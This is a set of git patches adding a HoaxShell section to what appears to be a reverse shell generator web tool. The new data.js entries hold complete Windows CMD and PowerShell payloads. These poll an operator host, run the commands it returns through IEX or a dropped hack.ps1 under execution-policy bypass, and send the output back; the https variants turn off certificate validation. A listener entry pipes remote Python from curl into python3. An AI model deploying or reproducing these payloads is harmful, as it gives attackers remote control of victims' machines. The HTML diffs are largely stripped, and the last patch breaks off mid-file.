From a3bdc150ff62bfe3dd704de3e5451a93179ae745 Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas Date: Wed, 15 Feb 2023 21:02:38 +0100 Subject: [PATCH 1/8] Update data.js --- js/data.js | 68 ++++++++++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 64 insertions(+), 4 deletions(-) diff --git a/js/data.js b/js/data.js index 7cb152f..bbfedf5 100644 --- a/js/data.js +++ b/js/data.js @@ -2,7 +2,8 @@ const CommandType = { 'ReverseShell': 'ReverseShell', 'BindShell': 'BindShell', - 'MSFVenom': 'MSFVenom' + 'MSFVenom': 'MSFVenom', + 'HoaxShell': 'HoaxShell' }; const withCommandType = function (commandType, elements) { @@ -471,11 +472,68 @@ const msfvenomCommands = withCommandType( ] ); + +const hoaxShellCommands = withCommandType( + CommandType.HoaxShell, + [ + { + "name": "Windows CMD cURL http", + "command": "", + "meta": ["windows"] + }, + { + "name": "PowerShell IEX http", + "command": "$s='{IP}:{PORT}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell IEX Constr Lang Mode http", + "command": "$s='{IP}:{PORT}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Outfile http", + "command": "$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Outfile Constr Lang Mode http", + "command": "$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "Windows CMD cURL https", + "command": "", + "meta": ["windows"] + }, + { + "name": "PowerShell IEX https", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Constr Lang Mode IEX https", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Outfile https", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Outfile Constr Lang Mode https", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "meta": ["windows"] + } + ] +); + const rsgData = { listenerCommands: [ ['nc', 'nc -lvnp {port}'], - ['busybox nc', 'busybox nc -lp {port}'], + ['busybox nc', 'busybox nc -lp {port}'], ['ncat', 'ncat -lvnp {port}'], ['ncat.exe', 'ncat.exe -lvnp {port}'], ['ncat (TLS)', 'ncat --ssl -lvnp {port}'], @@ -487,7 +545,8 @@ const rsgData = { ['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'], ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'], ['powercat', 'powercat -l -p {port}'], - ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'] + ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'], + ['hoaxshell', 'sudo python3 -c $(curl -s ) -t {payload}'] ], shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'], @@ -501,7 +560,8 @@ const rsgData = { reverseShellCommands: [ ...reverseShellCommands, ...bindShellCommands, - ...msfvenomCommands + ...msfvenomCommands, + ...hoaxShellCommands ] } From b5b4b01c86d9b00a519027a3a5ed45b15751b4c2 Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas Date: Wed, 15 Feb 2023 21:26:57 +0100 Subject: [PATCH 2/8] Update index.html --- index.html | 64 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) diff --git a/index.html b/index.html index 8a6bc93..c7035c4 100644 --- a/index.html +++ b/index.html @@ -192,6 +192,10 @@ MSFVenom +
  • + HoaxShell +
    • + + +
    +
    +
    + +
    +
    + +
    +
    + +
    +
    + + +
    + + +
    +
    + 
    🚀
    + 
    
+                                            
    
+                                        
    
+
+                                        
    
+                                            
+                                            
+
+                                            
+                                            
+
+                                            
+                                            
+                                        
    
+                                    
    
+                                    
+                            
    
+                        
    
+                    
    
+                
    
+                
     
    
 
     

From bc9d73f581f67e30ac57ad83d06c4c3a1cde36aa Mon Sep 17 00:00:00 2001
From: Panagiotis Chartas 
Date: Thu, 16 Feb 2023 17:34:21 +0100
Subject: [PATCH 3/8] Added HoaxShell

---
 index.html | 31 ++++++++++++-------------------
 1 file changed, 12 insertions(+), 19 deletions(-)

diff --git a/index.html b/index.html
index c7035c4..89d2662 100644
--- a/index.html
+++ b/index.html
@@ -193,8 +193,8 @@
                     aria-controls="msfvenom" aria-selected="false">MSFVenom
             
             
  • 
-                HoaxShell
+                HoaxShell
             
    • 
             
+            
+            
 
             
             
    
@@ -460,7 +461,7 @@
                         
                         
    
                             
    
-                                    
+                                    
                                     
    
                                         
    
@@ -482,21 +483,12 @@
                                         
    
 
                                         
    
-                                            
-                                            
 
-                                            
-                                            
+                                            
+                                            
 
                                             
                                             
    
                 
    
-                
+            
    
+            
     
    
 
     

From d3248454bc15aee8092e7a21f7dd5b188c224f10 Mon Sep 17 00:00:00 2001
From: Panagiotis Chartas 
Date: Thu, 16 Feb 2023 17:35:30 +0100
Subject: [PATCH 4/8] Added HoaxShell

---
 js/data.js | 49 ++++++++++++++++++++++++++++++++-----------------
 1 file changed, 32 insertions(+), 17 deletions(-)

diff --git a/js/data.js b/js/data.js
index bbfedf5..bad3d2b 100644
--- a/js/data.js
+++ b/js/data.js
@@ -477,53 +477,53 @@ const hoaxShellCommands =  withCommandType(
     CommandType.HoaxShell,
     [
         {
-            "name": "Windows CMD cURL http",
-            "command": "",
+            "name": "Windows CMD cURL",
+            "command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
             "meta": ["windows"]
         },
         {
-            "name": "PowerShell IEX http",
-            "command": "$s='{IP}:{PORT}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+            "name": "PowerShell IEX",
+            "command": "$s='{ip}:{port}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
             "meta": ["windows"]
         },
         {
-            "name": "PowerShell IEX Constr Lang Mode http",
-            "command": "$s='{IP}:{PORT}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+            "name": "PowerShell IEX Constr Lang Mode",
+            "command": "$s='{ip}:{port}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
             "meta": ["windows"]
         },
         {
-            "name": "PowerShell Outfile http",
-            "command": "$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+            "name": "PowerShell Outfile",
+            "command": "$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
             "meta": ["windows"]
         },
         {
-            "name": "PowerShell Outfile Constr Lang Mode http",
-            "command": "$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+            "name": "PowerShell Outfile Constr Lang Mode",
+            "command": "$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
             "meta": ["windows"]
         },
         {
             "name": "Windows CMD cURL https",
-            "command": "",
+            "command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=https://&&curl -fs -k !protocol!!ip!/eb6a44aa -H !sid! > NUL & for /L %i in (0) do (curl -fs -k !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl -fs -k !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
             "meta": ["windows"]
         },
         {
             "name": "PowerShell IEX https",
-            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
             "meta": ["windows"]
         },
         {
             "name": "PowerShell Constr Lang Mode IEX https",
-            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
             "meta": ["windows"]
         },
         {
             "name": "PowerShell Outfile https",
-            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
             "meta": ["windows"]
         },
         {
             "name": "PowerShell Outfile Constr Lang Mode https",
-            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
             "meta": ["windows"]
         }
     ]
@@ -546,7 +546,7 @@ const rsgData = {
         ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
         ['powercat', 'powercat -l -p {port}'],
         ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'],
-	['hoaxshell', 'sudo python3 -c $(curl -s ) -t {payload}']
+        ['hoaxshell', 'python3 -c "$(curl -s https://raw.githubusercontent.com/t3l3machus/hoaxshell/main/revshells/hoaxshell-listener.py)" -t {type} -p {port}']
     ],
 
     shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'],
@@ -563,7 +563,22 @@ const rsgData = {
         ...msfvenomCommands,
         ...hoaxShellCommands
     ]
-}
+};
+
+const hoaxshell_listener_types = {
+	
+	"Windows CMD cURL" : "cmd-curl",
+	"PowerShell IEX" : "ps-iex",
+	"PowerShell IEX Constr Lang Mode" : "ps-iex-cm",
+	"PowerShell Outfile" : "ps-outfile",
+	"PowerShell Outfile Constr Lang Mode" : "ps-outfile-cm",
+	"Windows CMD cURL https" : "cmd-curl -c /your/cert.pem -k /your/key.pem",
+	"PowerShell IEX https" : "ps-iex -c /your/cert.pem -k /your/key.pem",
+	"PowerShell IEX Constr Lang Mode https" : "ps-iex-cm -c /your/cert.pem -k /your/key.pem",
+	"PowerShell Outfile https" : "ps-outfile -c /your/cert.pem -k /your/key.pem",
+	"PowerShell Outfile Constr Lang Mode https" : "ps-outfile-cm -c /your/cert.pem -k /your/key.pem"	
+	
+};
 
 // Export the data for use within netlify functions / node
 if (typeof exports !== 'undefined') {

From be35cc480fa05d9d52535cdd60f3d2a3eed77fc0 Mon Sep 17 00:00:00 2001
From: Panagiotis Chartas 
Date: Thu, 16 Feb 2023 17:36:26 +0100
Subject: [PATCH 5/8] Added HoaxShell

---
 js/script.js | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)

diff --git a/js/script.js b/js/script.js
index e9d1a41..da6ef86 100644
--- a/js/script.js
+++ b/js/script.js
@@ -10,6 +10,7 @@ const listenerCommand = document.querySelector("#listener-command");
 const reverseShellCommand = document.querySelector("#reverse-shell-command");
 const bindShellCommand = document.querySelector("#bind-shell-command");
 const msfVenomCommand = document.querySelector("#msfvenom-command");
+const hoaxShellCommand = document.querySelector("#hoaxshell-command");
 
 const FilterType = {
     'All': 'all',
@@ -54,6 +55,15 @@ encoding: "None"
     });
 });
 
+
+document.querySelector("#hoaxshell-tab").addEventListener("click", () => {
